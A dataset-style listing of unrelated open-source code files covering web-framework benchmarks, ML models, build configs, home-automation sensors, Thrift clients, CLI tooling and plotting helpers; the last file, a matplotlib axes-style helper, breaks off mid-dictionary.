max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content
---|---|---|---|---|
python/django/app/views.py
|
mattiapenati/web-frameworks
| 5,710 |
87665
|
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
def index(request):
return HttpResponse(status=200)
def get_user(request, id):
return HttpResponse(id)
@csrf_exempt
def create_user(request):
return HttpResponse(status=200)
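# For context only: a hypothetical urls.py sketch (not part of this file) showing
# how these handlers could be wired up; the "app" module name and route shapes are
# assumptions based on the file's path, not taken from the benchmark source.
from django.urls import path

from app import views

urlpatterns = [
    path("", views.index),
    path("user/<id>", views.get_user),
    path("user", views.create_user),
]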
|
baselines/EMNLP2019/general_inputter.py
|
ParikhKadam/knowledge-net
| 240 |
87718
|
"""Define inputters reading from TFRecord files."""
import tensorflow as tf
from opennmt.inputters.inputter import Inputter
from opennmt.utils import compat
import numpy as np
from collections import defaultdict
import yaml
class Feature:
def __init__(self, name, shape, where):
self.name = name
self.shape = shape
self.where = where
class RecordInputter(Inputter):
"""Inputter that reads a header file that discribes the tensors and shapes
"""
def __init__(self, dtype=tf.float32):
"""Initializes the parameters of the record inputter.
Args:
dtype: The values type.
"""
super(RecordInputter, self).__init__(dtype=dtype)
def initialize(self, metadata, asset_dir=None, asset_prefix=""):
config_file = metadata['config_file']
# read config file
self.input_features = []
self.has = defaultdict(bool)
with open(config_file, "r") as f:
config = yaml.safe_load(f)
for fi in config["features"]:
f = Feature(fi[0], fi[1], fi[2])
self.has[f.where] = True
self.input_features.append(f)
print(self.input_features)
def make_dataset(self, data_file, training=None):
return tf.data.TFRecordDataset(data_file)
def get_dataset_size(self, data_file):
return sum(1 for _ in compat.tf_compat(v1="python_io.tf_record_iterator")(data_file))
def get_receiver_tensors(self):
ret = {}
if self.has_word():
ret["numWords"] = tf.placeholder(tf.int32, shape=(None,), name="numWords")
for feature in self.input_features:
      shape = [None if x < 0 else x for x in feature.shape]
shape.insert(0, None) # batch size
ret[feature.name] = tf.placeholder(tf.float32, shape=tuple(shape), name=feature.name)
return ret
def make_features(self, element=None, features=None, training=None):
if features is None:
features = {}
if self.input_features[0].name in features:
return features
if element is None:
raise RuntimeError("make_features was called with None element")
tf_parse_example = compat.tf_compat(v2="io.parse_single_example", v1="parse_single_example")
tf_var_len_feature = compat.tf_compat(v2="io.VarLenFeature", v1="VarLenFeature")
featuresDict = {}
if self.has_word():
featuresDict["numWords"] = tf_var_len_feature(tf.int64)
for feature in self.input_features:
featuresDict[feature.name] = tf_var_len_feature(tf.float32)
example = tf_parse_example(element, features=featuresDict)
if self.has_word():
features["numWords"] = tf.cast(example["numWords"].values, tf.int32)[0]
for feature in self.input_features:
print(feature.name, feature.shape)
features[feature.name] = tf.reshape(example[feature.name].values, feature.shape)
print("features", features)
return features
def get_word(self, features, training=None):
to_concat = []
for feature in self.input_features:
if feature.where == "word":
to_concat.append(features[feature.name])
return tf.concat(to_concat, axis=-1)
def get_global(self, features, training=None):
to_concat = []
for feature in self.input_features:
if feature.where == "global":
to_concat.append(features[feature.name])
if len(to_concat) == 1:
return to_concat[0]
return tf.concat(to_concat, axis=-1)
def get_lm(self, features, training=None):
to_concat = []
for feature in self.input_features:
if feature.where == "lm":
to_concat.append(features[feature.name])
return tf.concat(to_concat, axis=-2)
def has_word(self):
return self.has["word"]
def has_lm(self):
return self.has["lm"]
def has_global(self):
return self.has["global"]
def get_length(self, features, training=None):
return features["numWords"] if "numWords" in features else 1
|
scripts/shared_qvm.py
|
karlosz/qvm
| 321 |
87729
|
#!/usr/bin/env python
### shared_qvm.py
###
### Author: <NAME>
###
### Copyright (c) 2017 Rigetti Computing
### This file shows a minimal example of how to use the --shared
### option with QVM from Python.
from __future__ import print_function
import posix_ipc as pos
import mmap
import ctypes
import numpy as np
import socket
import json
import sys
from pyquil.api import QVMConnection
from pyquil.quil import Program
from pyquil.gates import X
def query_length_offset(name):
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect('/tmp/' + name)
s.sendall("?")
message, peer = s.recvfrom(4096)
length, offset = message.split(',')
return int(length), int(offset)
def retrieve_wavefunction(name):
length, offset = query_length_offset(name)
shm = pos.SharedMemory(name)
m = mmap.mmap(shm.fd, shm.size)
    # get the pointer to what appears to be an array of bytes
ptr = ctypes.POINTER(ctypes.c_ubyte)(ctypes.c_void_p.from_buffer(m, offset))
# cast to array of complex double floats
ptr = ctypes.cast(ptr, np.ctypeslib.ndpointer(shape=(length,), dtype=np.complex128))
return np.ctypeslib.as_array(ptr)
# Example use of this interface.
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Syntax: shared_qvm.py <name>')
sys.exit(1)
name = sys.argv[1]
cxn = QVMConnection(sync_endpoint='http://127.0.0.1:5000')
wf = retrieve_wavefunction(name)
print("Initial wavefunction:")
print(wf)
print("Initializing to W state.")
wf[0b0000] = 0j
wf[0b0001] = (1+0j)/np.sqrt(4)
wf[0b0010] = (1+0j)/np.sqrt(4)
wf[0b0100] = (1+0j)/np.sqrt(4)
wf[0b1000] = (1+0j)/np.sqrt(4)
print(wf)
print("Evolving with X3X2X1X0 via QVM. Quil program is:")
p = Program().inst([X(q) for q in range(4)])
print(p)
cxn.run(p, [0])
print("Printing evolved state.")
for b in range(len(wf)):
if not np.isclose(wf[b], 0j):
print("{0:04b} => {1}".format(b, wf[b]))
|
python/np-linear-algebra.py
|
gajubadge11/HackerRank-1
| 340 |
87738
|
import numpy as np
n = int(input().strip())
array = np.array([[float(x) for x in input().strip().split()] for _ in range(n)], dtype=float)
print(np.linalg.det(array))
|
src/third_party/flac/flac.gyp
|
goochen/naiveproxy
| 2,151 |
87781
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'libflac',
'product_name': 'flac',
'type': 'static_library',
'sources': [
'include/FLAC/all.h',
'include/FLAC/assert.h',
'include/FLAC/callback.h',
'include/FLAC/export.h',
'include/FLAC/format.h',
'include/FLAC/metadata.h',
'include/FLAC/ordinals.h',
'include/FLAC/stream_decoder.h',
'include/FLAC/stream_encoder.h',
'include/share/alloc.h',
'include/share/compat.h',
'include/share/endswap.h',
'include/share/private.h',
'src/libFLAC/alloc.c',
'src/libFLAC/bitmath.c',
'src/libFLAC/bitreader.c',
'src/libFLAC/bitwriter.c',
'src/libFLAC/cpu.c',
'src/libFLAC/crc.c',
'src/libFLAC/fixed.c',
'src/libFLAC/float.c',
'src/libFLAC/format.c',
'src/libFLAC/lpc.c',
'src/libFLAC/md5.c',
'src/libFLAC/memory.c',
'src/libFLAC/stream_decoder.c',
'src/libFLAC/stream_encoder.c',
'src/libFLAC/stream_encoder_framing.c',
'src/libFLAC/window.c',
'src/libFLAC/include/private/all.h',
'src/libFLAC/include/private/bitmath.h',
'src/libFLAC/include/private/bitreader.h',
'src/libFLAC/include/private/bitwriter.h',
'src/libFLAC/include/private/cpu.h',
'src/libFLAC/include/private/crc.h',
'src/libFLAC/include/private/fixed.h',
'src/libFLAC/include/private/float.h',
'src/libFLAC/include/private/format.h',
'src/libFLAC/include/private/lpc.h',
'src/libFLAC/include/private/macros.h',
'src/libFLAC/include/private/md5.h',
'src/libFLAC/include/private/memory.h',
'src/libFLAC/include/private/metadata.h',
'src/libFLAC/include/private/stream_encoder.h',
'src/libFLAC/include/private/stream_encoder_framing.h',
'src/libFLAC/include/private/window.h',
'src/libFLAC/include/protected/all.h',
'src/libFLAC/include/protected/stream_decoder.h',
'src/libFLAC/include/protected/stream_encoder.h',
],
'defines': [
'FLAC__NO_DLL',
'FLAC__OVERFLOW_DETECT',
'VERSION="1.3.1"',
'HAVE_LROUND',
],
'conditions': [
['OS=="win"', {
'sources': [
'include/share/win_utf8_io.h',
'src/share/win_utf8_io/win_utf8_io.c',
],
'defines!': [
'WIN32_LEAN_AND_MEAN', # win_utf8_io.c defines this itself.
],
'msvs_settings': {
'VCCLCompilerTool': {
'AdditionalOptions': [
'/wd4334', # 32-bit shift converted to 64 bits.
'/wd4267', # Converting from size_t to unsigned on 64-bit.
],
},
},
}, {
'defines': [
'HAVE_INTTYPES_H',
],
}],
],
'include_dirs': [
'include',
'src/libFLAC/include',
],
'direct_dependent_settings': {
'defines': [
'FLAC__NO_DLL',
],
},
'variables': {
'clang_warning_flags': [
# libflac converts between FLAC__StreamDecoderState and
# FLAC__StreamDecoderInitStatus a lot in stream_decoder.c.
'-Wno-conversion',
# libflac contains constants that are only used in certain
# compile-time cases, which triggers unused-const-variable warnings in
# other cases.
'-Wno-unused-const-variable',
],
},
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
|
tests/server_test.py
|
Adrijaned/weechat-matrix
| 773 |
87800
|
from matrix.server import MatrixServer
from matrix._weechat import MockConfig
import matrix.globals as G
G.CONFIG = MockConfig()
class TestClass(object):
def test_address_parsing(self):
homeserver = MatrixServer._parse_url("example.org", 8080)
assert homeserver.hostname == "example.org"
assert homeserver.geturl() == "https://example.org:8080"
homeserver = MatrixServer._parse_url("example.org/_matrix", 80)
assert homeserver.hostname == "example.org"
assert homeserver.geturl() == "https://example.org:80/_matrix"
homeserver = MatrixServer._parse_url(
"https://example.org/_matrix", 80
)
assert homeserver.hostname == "example.org"
assert homeserver.geturl() == "https://example.org:80/_matrix"
|
esphome/components/pmsa003i/sensor.py
|
OttoWinter/esphomeyaml
| 249 |
87821
|
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import i2c, sensor
from esphome.const import (
CONF_ID,
CONF_PM_1_0,
CONF_PM_2_5,
CONF_PM_10_0,
CONF_PMC_0_5,
CONF_PMC_1_0,
CONF_PMC_2_5,
CONF_PMC_10_0,
UNIT_MICROGRAMS_PER_CUBIC_METER,
ICON_CHEMICAL_WEAPON,
ICON_COUNTER,
DEVICE_CLASS_PM1,
DEVICE_CLASS_PM10,
DEVICE_CLASS_PM25,
STATE_CLASS_MEASUREMENT,
)
CODEOWNERS = ["@sjtrny"]
DEPENDENCIES = ["i2c"]
pmsa003i_ns = cg.esphome_ns.namespace("pmsa003i")
PMSA003IComponent = pmsa003i_ns.class_(
"PMSA003IComponent", cg.PollingComponent, i2c.I2CDevice
)
CONF_STANDARD_UNITS = "standard_units"
UNIT_COUNTS_PER_100ML = "#/0.1L"
CONF_PMC_0_3 = "pmc_0_3"
CONF_PMC_5_0 = "pmc_5_0"
CONFIG_SCHEMA = (
cv.Schema(
{
cv.GenerateID(): cv.declare_id(PMSA003IComponent),
cv.Optional(CONF_STANDARD_UNITS, default=True): cv.boolean,
cv.Optional(CONF_PM_1_0): sensor.sensor_schema(
unit_of_measurement=UNIT_MICROGRAMS_PER_CUBIC_METER,
icon=ICON_CHEMICAL_WEAPON,
accuracy_decimals=2,
device_class=DEVICE_CLASS_PM1,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PM_2_5): sensor.sensor_schema(
unit_of_measurement=UNIT_MICROGRAMS_PER_CUBIC_METER,
icon=ICON_CHEMICAL_WEAPON,
accuracy_decimals=2,
device_class=DEVICE_CLASS_PM25,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PM_10_0): sensor.sensor_schema(
unit_of_measurement=UNIT_MICROGRAMS_PER_CUBIC_METER,
icon=ICON_CHEMICAL_WEAPON,
accuracy_decimals=2,
device_class=DEVICE_CLASS_PM10,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_0_3): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_0_5): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_1_0): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_2_5): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_5_0): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_PMC_10_0): sensor.sensor_schema(
unit_of_measurement=UNIT_COUNTS_PER_100ML,
icon=ICON_COUNTER,
accuracy_decimals=0,
state_class=STATE_CLASS_MEASUREMENT,
),
}
)
.extend(cv.polling_component_schema("60s"))
.extend(i2c.i2c_device_schema(0x12))
)
TYPES = {
CONF_PM_1_0: "set_pm_1_0_sensor",
CONF_PM_2_5: "set_pm_2_5_sensor",
CONF_PM_10_0: "set_pm_10_0_sensor",
CONF_PMC_0_3: "set_pmc_0_3_sensor",
CONF_PMC_0_5: "set_pmc_0_5_sensor",
CONF_PMC_1_0: "set_pmc_1_0_sensor",
CONF_PMC_2_5: "set_pmc_2_5_sensor",
CONF_PMC_5_0: "set_pmc_5_0_sensor",
CONF_PMC_10_0: "set_pmc_10_0_sensor",
}
async def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
await i2c.register_i2c_device(var, config)
cg.add(var.set_standard_units(config[CONF_STANDARD_UNITS]))
for key, funcName in TYPES.items():
if key in config:
sens = await sensor.new_sensor(config[key])
cg.add(getattr(var, funcName)(sens))
|
pudzu/sandbox/tureen.py
|
Udzu/pudzu
| 119 |
87844
|
import itertools
import operator
import re
import bs4
from pudzu.utils import *
# Various utilities for BeautifulSoup
# helper functions since: (a) bs4 tags need to be compared with is, not eq; (b) they're iterable
def remove_duplicate_tags(l):
"""Remove duplicate tags from a list (using object identity rather than equality)"""
return remove_duplicates(l, key=id)
def non_bs4_iterable(v):
"""Whether an object is a non-bs4 iterable."""
return non_string_iterable(v) and not hasattr(v, "find_all")
def make_bs4_iterable(v):
"""Return a non-bs4 iterable from an object, wrapping it in a tuple if needed."""
return v if non_bs4_iterable(v) else (v,)
# pretty-printing tags
def print_tags(tags, attr=None):
"""Print one or more tags, excluding any nested content."""
for tag in make_bs4_iterable(tags):
if attr is not None:
print(tag.attrs.get(attr, ""))
elif hasattr(tag, "attr"):
attrs = " ".join('{}="{}"'.format(k, " ".join(v) if non_string_iterable(v) else v) for k, v in sorted(tag.attrs.items()))
print("<{}{}{}>".format(tag.name, "" if len(tag.attrs) == 0 else " ", attrs))
else:
print(tag)
def print_path(tag):
"""Print the path from the root down to a tag."""
print_tags(list(itertools.chain([tag], tag.parents))[-2::-1])
pt = print_tags
pp = print_path
# filtering
def re_exclude(pattern):
"""Negated regular expression filter."""
pattern = re.compile(pattern)
return lambda v: v and not re.search(pattern, v)
def is_parent(t, s):
"""Whether t is s's parent."""
return t is s.parent
def is_child(t, s):
"""Whether t is s's child."""
return s is t.parent
def is_ancestor(t, s):
"""Whether t is an ancestor of s."""
return is_in(t, s.parents)
def is_descendent(t, s):
"""Whether t is a descendent of s."""
return is_in(s, t.parents)
def is_after(t, s):
"""Whether t occurs after s."""
return is_in(t, s.next_elements)
def is_before(t, s):
"""Whether t occurs before s."""
return is_in(s, t.next_elements)
def exclude_tags(tags, excluded, relation=operator.is_):
"""Filter out tags that are related to at least one of the excluded set."""
return [t for t in make_bs4_iterable(tags) if not any(relation(t, s) for s in make_bs4_iterable(excluded))]
def restrict_tags(tags, included, relation=operator.is_):
"""Restrict to tags that are related to at least one of the included set."""
return [t for t in make_bs4_iterable(tags) if any(relation(t, s) for s in make_bs4_iterable(included))]
# finding tags by chaining
def curry_method(method):
def fn(*args, **kwargs):
return lambda o: method(o, *args, **kwargs)
return fn
all_ = curry_method(bs4.element.Tag.find_all)
next_ = curry_method(bs4.element.Tag.find_all_next)
prev_ = curry_method(bs4.element.Tag.find_all_previous)
parents_ = curry_method(bs4.element.Tag.find_parents)
next_siblings_ = curry_method(bs4.element.Tag.find_next_siblings)
prev_siblings_ = curry_method(bs4.element.Tag.find_previous_siblings)
select_ = curry_method(bs4.element.Tag.select)
exclude_ = curry_method(exclude_tags)
restrict_ = curry_method(restrict_tags)
def find_tags(tags, *fns):
"""Apply a chain sequence of find methods to a collection of tags. Result may contain duplicates."""
ts = make_bs4_iterable(tags)
for fn in fns:
if not callable(fn):
fn = all_(fn)
ts = [s for t in ts for s in make_bs4_iterable(fn(t))]
return ts
def find_tag(tags, *fns):
"""Same as find_tags but returns the first result only (or None if there are none)."""
return first(find_tags(tags, *fns))
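# Illustrative usage sketch (the HTML and selectors are made up): find_tags wraps
# bare arguments in all_(), so strings and curried finders can be chained freely.
soup = bs4.BeautifulSoup(
    "<div><ul><li><a href='/a'>A</a></li><li><a href='/b'>B</a></li></ul></div>",
    "html.parser")
links = find_tags(soup, "ul", all_("a", href=True))
print_tags(links, attr="href")          # prints /a and /b
first_link = find_tag(soup, "li", "a")  # first <a> reached via an <li>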
|
Python/SingleNumber.py
|
TonnyL/Windary
| 205 |
87846
|
# Given an array of integers, every element appears twice except for one. Find that single one.
#
# Note:
# Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?
#
# Python, Python3 all accepted.
class SingleNumber:
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
s = 0
if nums is None:
return s
for i in nums:
s ^= i
return s
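# Quick sanity check with illustrative values: paired elements cancel under XOR,
# leaving the single one (4 ^ 1 ^ 2 ^ 1 ^ 2 == 4).
assert SingleNumber().singleNumber([4, 1, 2, 1, 2]) == 4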
|
src/head_detector_vgg16.py
|
bill-lin/FCHD-Fully-Convolutional-Head-Detector
| 648 |
87850
|
import torch as t
from torch import nn
from torchvision.models import vgg16
from src.region_proposal_network import RegionProposalNetwork
from src.head_detector import Head_Detector
from src.config import opt
def decom_vgg16():
""" Load the default PyTorch model or the pre-trained caffe model.
Freeze the weights of some layers of the network and train the rest
of the features.
"""
if opt.caffe_pretrain:
# Load the caffe model
model = vgg16(pretrained=False)
model.load_state_dict(t.load(opt.caffe_pretrain_path))
else:
# Load the default model in PyTorch
model = vgg16(pretrained=True)
features = list(model.features)[:30]
# Freeze some of the layers.
# for layer in features[:10]:
# for p in layer.parameters():
# p.requires_grad = False
return nn.Sequential(*features)
class Head_Detector_VGG16(Head_Detector):
""" Head detector based on VGG16 model.
Have two components:
1) Fixed feature extractor from the conv_5 layer of the VGG16
2) A region proposal network on the top of the extractor.
"""
feat_stride = 16
def __init__(self, ratios=[0.5, 1, 2], anchor_scales=[8,16,32]):
extractor = decom_vgg16()
rpn = RegionProposalNetwork(
512, 512,
ratios=ratios,
anchor_scales=anchor_scales,
feat_stride=self.feat_stride
)
super(Head_Detector_VGG16, self).__init__(
extractor,
rpn
)
pass
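# Rough illustration of why feat_stride is 16 (assumes opt.caffe_pretrain is False
# and torchvision can fetch the pretrained weights): the truncated VGG16 applies
# four 2x2 max-pools, so a 224x224 input gives a 14x14 conv5 feature map.
extractor = decom_vgg16()                  # first 30 layers of torchvision VGG16 "features"
feat = extractor(t.zeros(1, 3, 224, 224))
print(feat.shape)                          # torch.Size([1, 512, 14, 14])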
|
rman_translators/rman_alembic_translator.py
|
fxjeane/RenderManForBlender
| 312 |
87852
|
from .rman_translator import RmanTranslator
from ..rman_sg_nodes.rman_sg_alembic import RmanSgAlembic
from ..rfb_utils import transform_utils
from ..rfb_utils import string_utils
from ..rfb_logger import rfb_log
class RmanAlembicTranslator(RmanTranslator):
def __init__(self, rman_scene):
super().__init__(rman_scene)
self.bl_type = 'ALEMBIC'
def export(self, ob, db_name):
sg_node = self.rman_scene.sg_scene.CreateProcedural(db_name)
sg_node.Define("DynamicLoad", None)
rman_sg_alembic = RmanSgAlembic(self.rman_scene, sg_node, db_name)
return rman_sg_alembic
def export_deform_sample(self, rman_sg_alembic, ob, time_sample):
pass
def update(self, ob, rman_sg_alembic):
rm = ob.renderman
abc_filepath = string_utils.expand_string(rm.abc_filepath)
bounds = (-100000, 100000, -100000, 100000, -100000, 100000 )
primvar = rman_sg_alembic.sg_node.GetPrimVars()
primvar.SetString(self.rman_scene.rman.Tokens.Rix.k_dsoname, 'AlembicProcPrim')
primvar.SetFloatArray(self.rman_scene.rman.Tokens.Rix.k_bound, bounds, 6)
shutter_interval = self.rman_scene.bl_scene.renderman.shutter_angle / 360.0
shutter_open, shutter_close = 0, shutter_interval
abc_frame = rm.abc_frame
if rm.abc_use_scene_frame:
rman_sg_alembic.is_frame_sensitive = True
abc_frame = float(self.rman_scene.bl_frame_current)
else:
rman_sg_alembic.is_frame_sensitive = False
abc_args = "-filename %s" % abc_filepath
abc_args += " -frame %f" % abc_frame
abc_args += " -fps %f" % rm.abc_fps
abc_args += " -shutteropen %f" % shutter_open
abc_args += " -shutterclose %f" % shutter_close
abc_args += " -velocityscale %f" % rm.abc_velocityScale
abc_args += " -ccw"
primvar.SetString(self.rman_scene.rman.Tokens.Rix.k_data, abc_args)
rman_sg_alembic.sg_node.SetPrimVars(primvar)
|
model/sep_conv.py
|
leoriohope/RandWireNN
| 757 |
87865
|
import torch
import torch.nn as nn
class SeparableConv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0,
dilation=1, bias=False):
super(SeparableConv2d,self).__init__()
self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size, stride, padding,
dilation, groups=in_channels, bias=bias)
self.pointwise = nn.Conv2d(in_channels, out_channels, 1, 1, 0, 1, 1, bias=bias)
def forward(self,x):
x = self.conv1(x)
x = self.pointwise(x)
return x
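# Minimal shape check (illustrative): the depthwise 3x3 convolution keeps the
# spatial size with padding=1, and the 1x1 pointwise convolution changes channels.
conv = SeparableConv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1)
y = conv(torch.randn(1, 32, 56, 56))
print(y.shape)  # torch.Size([1, 64, 56, 56])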
|
thrift/compiler/test/fixtures/namespace/gen-py3lite/my/namespacing/extend/test/extend/lite_clients.py
|
killight98/fbthrift
| 2,112 |
87872
|
#
# Autogenerated by Thrift
#
# DO NOT EDIT
# @generated
#
import typing as _typing
import folly.iobuf as _fbthrift_iobuf
from thrift.py3lite.client import (
AsyncClient as _fbthrift_py3lite_AsyncClient,
SyncClient as _fbthrift_py3lite_SyncClient,
Client as _fbthrift_py3lite_Client,
)
import thrift.py3lite.exceptions as _fbthrift_py3lite_exceptions
import thrift.py3lite.types as _fbthrift_py3lite_types
import py3lite_module_root.my.namespacing.extend.test.extend.lite_types
import py3lite_module_root.my.namespacing.test.hsmodule.lite_types
import py3lite_module_root.my.namespacing.test.hsmodule.lite_clients
class ExtendTestService(_fbthrift_py3lite_Client["ExtendTestService.Async", "ExtendTestService.Sync"]):
class Async(py3lite_module_root.my.namespacing.test.hsmodule.lite_clients.HsTestService.Async):
async def check(
self,
struct1: py3lite_module_root.my.namespacing.test.hsmodule.lite_types.HsFoo
) -> bool:
resp = await self._send_request(
"ExtendTestService",
"check",
py3lite_module_root.my.namespacing.extend.test.extend.lite_types._fbthrift_ExtendTestService_check_args(
struct1=struct1,),
py3lite_module_root.my.namespacing.extend.test.extend.lite_types._fbthrift_ExtendTestService_check_result,
)
# shortcut to success path for non-void returns
if resp.success is not None:
return resp.success
raise _fbthrift_py3lite_exceptions.ApplicationError(
_fbthrift_py3lite_exceptions.ApplicationErrorType.MISSING_RESULT,
"Empty Response",
)
class Sync(py3lite_module_root.my.namespacing.test.hsmodule.lite_clients.HsTestService.Sync):
def check(
self,
struct1: py3lite_module_root.my.namespacing.test.hsmodule.lite_types.HsFoo
) -> bool:
resp = self._send_request(
"ExtendTestService",
"check",
py3lite_module_root.my.namespacing.extend.test.extend.lite_types._fbthrift_ExtendTestService_check_args(
struct1=struct1,),
py3lite_module_root.my.namespacing.extend.test.extend.lite_types._fbthrift_ExtendTestService_check_result,
)
# shortcut to success path for non-void returns
if resp.success is not None:
return resp.success
raise _fbthrift_py3lite_exceptions.ApplicationError(
_fbthrift_py3lite_exceptions.ApplicationErrorType.MISSING_RESULT,
"Empty Response",
)
|
plugins/k8s/test/test_args.py
|
MrMarvin/cloudkeeper
| 316 |
87887
|
from resotolib.args import get_arg_parser, ArgumentParser
from resoto_plugin_k8s import KubernetesCollectorPlugin
def test_args():
arg_parser = get_arg_parser()
KubernetesCollectorPlugin.add_args(arg_parser)
arg_parser.parse_args()
assert len(ArgumentParser.args.k8s_context) == 0
assert ArgumentParser.args.k8s_config is None
assert len(ArgumentParser.args.k8s_cluster) == 0
assert len(ArgumentParser.args.k8s_apiserver) == 0
assert len(ArgumentParser.args.k8s_token) == 0
assert len(ArgumentParser.args.k8s_cacert) == 0
assert len(ArgumentParser.args.k8s_collect) == 0
assert len(ArgumentParser.args.k8s_no_collect) == 0
assert ArgumentParser.args.k8s_pool_size == 5
assert ArgumentParser.args.k8s_fork is False
|
vut/lib/python3.8/site-packages/pipenv/vendor/passa/cli/_base.py
|
dan-mutua/djangowk1
| 6,263 |
87895
|
# -*- coding=utf-8 -*-
from __future__ import absolute_import, unicode_literals
import argparse
import os
import sys
from .options import project
class BaseCommand(object):
"""A CLI command.
"""
name = None
description = None
default_arguments = [project]
arguments = []
def __init__(self, parser=None):
if not parser:
parser = argparse.ArgumentParser(
prog=os.path.basename(sys.argv[0]),
description="Base argument parser for passa"
)
self.parser = parser
self.add_arguments()
@classmethod
def build_parser(cls):
parser = argparse.ArgumentParser(
prog="passa {}".format(cls.name),
description=cls.description,
)
return cls(parser)
@classmethod
def run_parser(cls):
parser = cls.build_parser()
parser()
def __call__(self, argv=None):
options = self.parser.parse_args(argv)
result = self.main(options)
if result is not None:
sys.exit(result)
def add_default_arguments(self):
for arg in self.default_arguments:
arg.add_to_parser(self.parser)
def add_arguments(self):
self.add_default_arguments()
for arg in self.arguments:
arg.add_to_parser(self.parser)
def main(self, options):
return self.run(options)
def run(self, options):
raise NotImplementedError
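# Hypothetical subclass sketch (not part of passa) showing how the pieces fit
# together; the command name and behaviour below are invented for illustration.
class HelloCommand(BaseCommand):
    name = "hello"
    description = "Print a greeting."

    def run(self, options):
        print("hello from passa")
        return 0

# HelloCommand.run_parser() builds an argparse parser named "passa hello", adds
# the default `project` argument, parses sys.argv, calls main() -> run(), and
# exits with the returned status code.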
|
utils.py
|
dendisuhubdy/ALAE
| 3,477 |
87915
|
# Copyright 2019-2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from torch import nn
import torch
import threading
import hashlib
import pickle
import os
class cache:
def __init__(self, function):
self.function = function
self.pickle_name = self.function.__name__
def __call__(self, *args, **kwargs):
m = hashlib.sha256()
m.update(pickle.dumps((self.function.__name__, args, frozenset(kwargs.items()))))
output_path = os.path.join('.cache', "%s_%s" % (m.hexdigest(), self.pickle_name))
try:
with open(output_path, 'rb') as f:
data = pickle.load(f)
except (FileNotFoundError, pickle.PickleError):
data = self.function(*args, **kwargs)
os.makedirs(os.path.dirname(output_path), exist_ok=True)
with open(output_path, 'wb') as f:
pickle.dump(data, f)
return data
def save_model(x, name):
if isinstance(x, nn.DataParallel):
torch.save(x.module.state_dict(), name)
else:
torch.save(x.state_dict(), name)
class AsyncCall(object):
def __init__(self, fnc, callback=None):
self.Callable = fnc
self.Callback = callback
self.result = None
def __call__(self, *args, **kwargs):
self.Thread = threading.Thread(target=self.run, name=self.Callable.__name__, args=args, kwargs=kwargs)
self.Thread.start()
return self
def wait(self, timeout=None):
self.Thread.join(timeout)
        if self.Thread.is_alive():
raise TimeoutError
else:
return self.result
def run(self, *args, **kwargs):
self.result = self.Callable(*args, **kwargs)
if self.Callback:
self.Callback(self.result)
class AsyncMethod(object):
def __init__(self, fnc, callback=None):
self.Callable = fnc
self.Callback = callback
def __call__(self, *args, **kwargs):
return AsyncCall(self.Callable, self.Callback)(*args, **kwargs)
def async_func(fnc=None, callback=None):
if fnc is None:
def add_async_callback(f):
return AsyncMethod(f, callback)
return add_async_callback
else:
return AsyncMethod(fnc, callback)
class Registry(dict):
def __init__(self, *args, **kwargs):
super(Registry, self).__init__(*args, **kwargs)
def register(self, module_name):
def register_fn(module):
assert module_name not in self
self[module_name] = module
return module
return register_fn
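# Usage sketches for the helpers above (illustrative only; the cached function
# and the background job are made-up examples).
@cache
def expensive(n):
    return sum(i * i for i in range(n))

expensive(10)   # computed, then pickled under ./.cache
expensive(10)   # the second call is read back from the cache file

@async_func
def background_job(x):
    return x * 2

call = background_job(21)   # runs in a background thread, returns the AsyncCall handle
print(call.wait())          # 42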
|
tueplots/axes.py
|
not-a-feature/tueplots
| 110 |
87924
|
"""Axes behaviour."""
def lines(
*,
base_width=0.5,
line_base_ratio=2.0,
tick_major_base_ratio=1.0,
tick_minor_base_ratio=0.5,
tick_size_width_ratio=3.0,
tick_major_size_min=3.0,
tick_minor_size_min=2.0,
axisbelow=True,
):
"""Adjust linewidth(s) according to a base width."""
tick_major_width = tick_major_base_ratio * base_width
tick_minor_width = tick_minor_base_ratio * base_width
tick_major_size = max(tick_major_size_min, tick_size_width_ratio * tick_major_width)
tick_minor_size = max(tick_minor_size_min, tick_size_width_ratio * tick_minor_width)
return {
# Set the line-widths appropriately (including the grid)
"axes.linewidth": base_width,
